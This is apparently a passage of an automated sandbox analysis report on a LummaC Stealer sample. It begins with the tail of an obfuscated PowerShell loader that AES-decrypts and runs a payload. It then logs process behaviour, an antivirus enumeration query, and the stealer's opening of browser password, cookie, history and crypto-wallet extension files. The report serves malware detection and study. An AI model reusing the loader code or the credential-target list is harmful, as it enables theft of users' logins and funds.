112c4ce5bc279b26783822f68eb2af9adade16ba3d008eeaab4bf10ba18ba6037c1affd5db8f63ad7ed00193207aa01009443c0ab2f530d584324a1f1d66ed86ad2e61ddf459bcad3fd5e17c8e7856537300894c18877f3b57c14639bd9781f101d0005e813e71f05721a4ea8b0d052a454533a555b8785235e946b52d496fb71de15c7bb50f3dcda385ba2ec195c6aa39504f078b7f5295e4814f28c62055ec0ac8b78a04219e96c739cbed36806d0748376e6be81c58a52ac85eb33543ce5aeab7709978ef4cda0021cbda1cb44e4400fef05ca556b0a2e939f422041c9bfff1639890cf68637888d4ed48e4');$aqvnd=-join [char[]](([security.cryptography.aes]::create()).createdecryptor((avoq('516866484f6b6b4270524e66557a6f4c')),[byte[]]::new(16)).transformfinalblock($qtexr,0,$qtexr.length)); & $aqvnd.substring(0,3) $aqvnd.substring(253)	Jump to behavior

Source: Concerts.com, 00000013.00000000.2207061624.0000000000D06000.00000002.00000001.01000000.00000012.sdmp, Significantly.9.dr, Concerts.com.10.dr

Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe

Code function: 9_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

9_2_00406831

Source: C:\Windows\System32\OpenSSH\ssh.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
